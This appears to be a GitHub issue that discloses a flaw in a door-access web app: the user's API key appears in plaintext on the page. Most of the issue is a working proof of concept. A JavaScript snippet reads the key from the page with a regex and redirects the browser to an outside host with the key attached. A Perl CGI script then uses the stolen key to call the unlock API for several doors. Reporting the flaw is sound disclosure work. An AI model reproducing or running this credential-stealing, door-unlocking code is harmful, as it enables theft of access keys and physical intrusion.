Skip to content

API key is displayed in plaintext on the page #17

Description

@worr
<script>var x=new XMLHttpRequest();x.addEventListener('load', function (event) { var key = x.responseText.match(/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/); setTimeout(function() {window.location = ('https://members.csh.rit.edu/~worr/gk.pl?userkey=' + key);}, 1000); }); x.open('GET', 'https://www.gatekeeper.csh.rit.edu/');x.send();</script>

This grabs the user key and sends it to this perl script:

#!/usr/local/bin/perl -wT
use strict;
use CGI;                                                                                                           
use LWP::UserAgent;                                                                                                
my $q = CGI->new;
my $ua = LWP::UserAgent->new;
my $userkey = $q->param(-name => 'userkey');

my $res = $ua->post('https://api.gatekeeper.csh.rit.edu/unlock/4/', { userkey => $userkey });
my $res = $ua->post('https://api.gatekeeper.csh.rit.edu/unlock/6/', { userkey => $userkey });
my $res = $ua->post('https://api.gatekeeper.csh.rit.edu/unlock/7/', { userkey => $userkey });

print $q->header, $q->start_html;
if ($res->is_success) {
    print $q->h1(uc($q->escapeHTML($ENV{WEBAUTH_USER})).' Y U UNLOCK DOORS'), $q->h2($q->escapeHTML($userkey));
    print $q->p($q->escapeHTML($res->decoded_content));
} else {
    print $q->h1('FUCK'), $q->h2("It didn't work...");
    print $q->p($q->escapeHTML($res->decoded_content));
}
print $q->end_html;

And then all of the doors are unlocked.

It doesn't matter that you expire the API key after a few minutes, since this script takes a second to run.

Metadata

Metadata

Assignees

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions